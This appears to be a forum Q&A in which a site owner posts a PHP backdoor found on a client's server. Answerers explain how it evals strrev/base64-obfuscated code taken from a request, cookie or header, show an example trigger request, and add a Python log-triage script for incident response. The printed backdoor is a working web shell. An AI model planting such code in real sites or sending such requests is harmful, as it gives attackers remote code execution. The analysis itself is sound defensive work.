I found this code on the root of a client's site. I decrypted it to mean the following:
    $brownies = create_function( ' ', eval(array_pop(func_get_args())); );
    $brownies('L','9','$','>','','K','H','B','m', $i=array_merge($_REQUEST,$_COOKIE,$_SERVER); $a=isset($i["geccmscu"]) ? $i["geccmscu"] : (isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die ); eval(strrev(base64_decode(strrev($a)))););
It looks like it's getting code from the cookie or user and evaluating it, but I can't tell further from there.
Anyone have insight for this?
Here is the code with some indentation:
    $brownies = create_function( ' ', eval(array_pop(func_get_args())); );
    $brownies('L','9','$','>','','K','H','B','m',
        $i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
        $a=isset($i["geccmscu"]) ? $i["geccmscu"] :
            (isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die );
        eval(strrev(base64_decode(strrev($a)))););
First it checks if among the cookies, request and server values (the $i variable), there is a "geccmscu" key. If not, it checks if a header with the same name is defined ("HTTP_GECCMSCU"). If not, the script stops there.
If that "geccmscu" variable was defined somewhere, it is stored in $a. The script then decodes it (the content is "encrypted" with strrev and base64) and executes it via eval().
Basically, someone could attack your server with an HTTP query such as this:
GET http://example.com?geccmscu=someevilphpcode
Then "someevilphpcode" will be decoded and executed on your server.
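For incident response, the same decoding can be run over web server logs to see what was actually sent to the backdoor. The following is an added example, not part of the original answer: it assumes combined-format access logs, and the log lines, the function names `decode_payload` and `triage`, and the harmless `echo 1;` payload are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "geccmscu"  # request key read by the backdoor shown on this page

# Constructed access-log lines (documentation IP ranges, benign payload).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?geccmscu=%3D%3DQZjh2bgEzO HTTP/1.1" 200 12',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /?geccmscu=test! HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_payload(value):
    """Undo strrev -> base64 -> strrev, the steps the backdoor applies before eval()."""
    try:
        # A literal '+' in the query string is turned into a space by URL decoding.
        raw = base64.b64decode(value[::-1].replace(" ", "+"), validate=True)
    except (binascii.Error, ValueError):
        return None  # probe or junk, not a well-formed payload
    return raw[::-1].decode("utf-8", errors="replace")


def triage(lines, param=PARAM):
    """Return (client, raw value, decoded payload or None) for each request using the key."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            hits.append((client, value, decode_payload(value)))
    return hits


if __name__ == "__main__":
    for client, value, decoded in triage(SAMPLE_LOG):
        print(client, repr(value), "->", repr(decoded))
```

Standard access logs record only the request line, so values delivered in a cookie, a POST body or a `Geccmscu` request header will not appear there; absence of hits does not show the backdoor was unused.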